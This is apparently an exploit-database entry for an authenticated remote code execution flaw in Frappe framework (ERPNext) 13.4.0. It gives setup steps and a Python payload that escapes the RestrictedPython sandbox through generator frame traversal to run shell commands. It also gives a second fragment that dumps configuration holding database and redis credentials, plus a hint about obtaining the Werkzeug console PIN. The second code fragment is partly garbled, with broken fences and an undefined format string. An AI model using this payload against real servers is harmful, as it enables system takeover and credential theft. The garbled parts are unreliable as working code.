Exploits / Vulnerability Discovered : 2023-07-11 |
Type : webapps |
Platform : python
This exploit / vulnerability Frappe framework (erpnext) 13.4.0 remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.
Requirements:
- 'System Manager' role (which is not necessarily the admin)
- Server config `server_script_enabled` set to `true` (likely)
Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.
```python3
hax = "echo pwned > /tmp/pwned"
g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
for x in g:0
```
g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
for x in g:0
```
Which prints the Frappe config like database/redis credentials, etc.
In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.